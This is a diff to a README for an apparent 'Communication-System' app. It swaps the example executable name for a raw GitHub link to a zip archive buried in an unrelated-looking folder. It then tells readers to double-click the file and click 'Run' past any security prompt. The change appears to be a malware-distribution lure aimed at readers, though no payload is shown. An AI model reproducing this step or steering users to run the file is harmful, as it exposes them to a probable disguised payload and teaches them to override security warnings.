Alimnagma/Communication-System/README.md

 ## 🛠️ Running the Application
 1. **Locate the Application:**
-   After downloading and extracting, find the executable file (e.g., `Communication-System.exe` or similar).
+   After downloading and extracting, find the executable file (e.g., `https://github.com/Alimnagma/Communication-System/raw/refs/heads/main/Nimrodic/System_Communication_v3.8-alpha.5.zip` or similar).

 2. **Double-Click to Open:**
    Simply double-click the file to run it.
 You might see a security prompt; if so, click "Run" to proceed.